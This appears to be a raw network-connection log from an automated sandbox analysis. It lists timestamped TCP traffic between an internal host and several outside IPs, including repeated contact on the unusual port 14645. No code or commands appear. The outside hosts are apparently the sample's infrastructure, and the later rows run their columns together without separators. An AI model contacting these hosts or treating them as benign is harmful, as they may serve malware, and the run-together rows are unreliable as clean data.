Aug 28, 2024 06:56:44.848054886 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848077059 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848078012 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848145008 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848155975 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848166943 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848179102 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848182917 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848268986 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848279953 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848289013 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848299980 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848309040 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848309994 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848329067 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848335028 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848347902 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848372936 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848406076 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848418951 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848428965 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848439932 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848462105 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848500967 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848512888 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848526001 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848547935 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848551035 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848558903 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848596096 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848625898 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848635912 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848645926 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848655939 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848661900 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848683119 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848716974 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848803997 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848814011 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848824024 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848834038 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848845005 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848851919 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848855972 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848866940 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848877907 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848879099 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848902941 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848913908 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848917007 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848923922 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848936081 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.848942995 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.848970890 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849033117 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849042892 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849051952 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849069118 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849102974 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849113941 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849123001 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849133968 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849139929 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849267960 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849278927 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849288940 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849299908 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849309921 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849311113 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849320889 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849327087 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849332094 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849344969 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849348068 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849358082 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849394083 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849412918 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849423885 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849433899 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849445105 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849450111 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849456072 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849495888 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849505901 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849505901 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849517107 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849525928 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849529028 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849539995 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849548101 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849553108 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849565029 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.849576950 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.849601984 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.890435934 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.890460968 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.890471935 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.890546083 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.890556097 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.890568018 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.890563965 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.890579939 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.890614986 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.890614986 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.934947968 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935061932 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935071945 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935081959 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935091972 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935102940 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935159922 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935170889 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935183048 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935188055 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935194016 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935206890 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935218096 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935254097 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935254097 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935254097 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935316086 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935328007 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935337067 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935353041 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935354948 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935368061 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935378075 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935383081 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935389042 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935400963 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935408115 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935411930 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935431957 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935611010 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935621977 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935632944 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935645103 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935650110 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935656071 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935667992 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935668945 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935678959 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935698032 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935703039 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935714960 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935724020 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935734987 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935745001 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935750008 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935755968 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935766935 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935776949 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935791016 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.935794115 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.935798883 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936019897 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936032057 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936072111 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936081886 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936094046 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936127901 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936167955 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936181068 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936191082 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936204910 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936209917 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936223030 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936256886 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936311960 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936322927 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936333895 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936345100 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936346054 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936357975 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936362028 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936373949 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936384916 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936388969 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936398029 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936408997 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936417103 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936422110 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936434984 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936450958 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936629057 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936640978 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936651945 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936661959 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936669111 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936672926 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936685085 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936741114 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936752081 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936762094 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936774015 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936777115 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936784983 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936789989 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936795950 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936806917 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936815977 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936816931 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936830044 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936840057 CEST  80  49169  192.3.193.155  192.168.2.22
Aug 28, 2024 06:56:44.936841965 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:44.936865091 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:45.000698090 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:45.510423899 CEST  49169  80  192.168.2.22  192.3.193.155
Aug 28, 2024 06:56:45.692965984 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:45.698137045 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:45.698808908 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:45.709642887 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:45.714574099 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:46.284116030 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:46.416570902 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:46.416631937 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:46.421490908 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:46.428674936 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:46.428733110 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:46.436167002 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:46.739727974 CEST  49171  443  192.168.2.22  88.99.66.38
Aug 28, 2024 06:56:46.739769936 CEST  443  49171  88.99.66.38  192.168.2.22
Aug 28, 2024 06:56:46.739821911 CEST  49171  443  192.168.2.22  88.99.66.38
Aug 28, 2024 06:56:46.740086079 CEST  49171  443  192.168.2.22  88.99.66.38
Aug 28, 2024 06:56:46.740099907 CEST  443  49171  88.99.66.38  192.168.2.22
Aug 28, 2024 06:56:47.034106970 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:47.036356926 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:47.041227102 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:47.151531935 CEST  14645  49170  192.3.64.135  192.168.2.22
Aug 28, 2024 06:56:47.237550020 CEST  49172  80  192.168.2.22  178.237.33.50
Aug 28, 2024 06:56:47.242963076 CEST  80  49172  178.237.33.50  192.168.2.22
Aug 28, 2024 06:56:47.243041992 CEST  49172  80  192.168.2.22  178.237.33.50
Aug 28, 2024 06:56:47.243263006 CEST  49172  80  192.168.2.22  178.237.33.50
Aug 28, 2024 06:56:47.248785019 CEST  80  49172  178.237.33.50  192.168.2.22
Aug 28, 2024 06:56:47.353890896 CEST  49170  14645  192.168.2.22  192.3.64.135
Aug 28, 2024 06:56:47.425703049 CEST  443  49171  88.99.66.38  192.168.2.22
Aug 28, 2024 06:56:47.425798893 CEST  49171  443  192.168.2.22  88.99.66.38
Aug 28, 2024 06:56:47.430711985 CEST  49171  443  192.168.2.22  88.99.66.38
Aug 28, 2024 06:56:47.430736065 CEST  443  49171  88.99.66.38  192.168.2.22
Aug 28, 2024 06:56:47.431044102 CEST  443  49171  88.99.66.38  192.168.2.22
Aug 28, 2024 06:56:47.431142092 CEST  49171  443  192.168.2.22  88.99.66.38
Aug 28, 2024 06:56:47.437357903 CEST  49171  443  192.168.2.22  88.99.66.38
Aug 28, 2024 06:56:47.480504990 CEST  443  49171  88.99.66.38  192.168.2.22
                                                      Aug 28, 2024 06:56:47.729562998 CEST4434917188.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:47.729650021 CEST4434917188.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:47.729675055 CEST49171443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:47.729705095 CEST49171443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:47.743175030 CEST49171443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:47.743201971 CEST4434917188.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:47.844196081 CEST8049172178.237.33.50192.168.2.22
                                                      Aug 28, 2024 06:56:47.844263077 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:56:47.942697048 CEST4917014645192.168.2.22192.3.64.135
                                                      Aug 28, 2024 06:56:47.947724104 CEST1464549170192.3.64.135192.168.2.22
                                                      Aug 28, 2024 06:56:48.843619108 CEST8049172178.237.33.50192.168.2.22
                                                      Aug 28, 2024 06:56:48.843698978 CEST4917280192.168.2.22178.237.33.50
                                                      Aug 28, 2024 06:56:48.966047049 CEST49173443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:48.966103077 CEST4434917388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:48.966159105 CEST49173443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:48.972672939 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:48.972691059 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:48.972742081 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.012836933 CEST4917580192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:49.017713070 CEST8049175192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:49.017800093 CEST4917580192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:49.019988060 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.020008087 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.021092892 CEST49173443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.021107912 CEST4434917388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.677252054 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.677328110 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.691843033 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.691874027 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.692138910 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.692194939 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.708456993 CEST4434917388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.708534956 CEST49173443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.717046976 CEST49173443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.717056990 CEST4434917388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.717313051 CEST4434917388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:49.717360020 CEST49173443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.906558990 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:49.952512980 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:50.106354952 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:50.106415033 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:50.106420994 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:50.106470108 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:50.110727072 CEST49174443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:50.110754967 CEST4434917488.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:50.112591982 CEST4917580192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:50.117459059 CEST8049175192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:50.218367100 CEST8049175192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:50.218487024 CEST4917580192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:55.221431017 CEST8049175192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:55.221481085 CEST4917580192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:56.369544029 CEST49173443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:56.369679928 CEST4917580192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:57:00.567487001 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:00.567532063 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:00.567593098 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:00.569178104 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:00.569194078 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.183353901 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.183434010 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.187586069 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.187599897 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.187913895 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.240474939 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.284506083 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478667021 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478693008 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478701115 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478718042 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478724957 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478727102 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478749037 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.478769064 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.478787899 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.478815079 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.479340076 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.506037951 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.506067991 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.506124020 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.506143093 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.506160975 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.574939013 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.574970961 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.575041056 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.575066090 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.575090885 CEST49176443192.168.2.22207.241.232.154
                                                      Aug 28, 2024 06:57:01.598727942 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.598756075 CEST44349176207.241.232.154192.168.2.22
                                                      Aug 28, 2024 06:57:01.598788023 CEST44349176207.241.232.154192.168.2.22
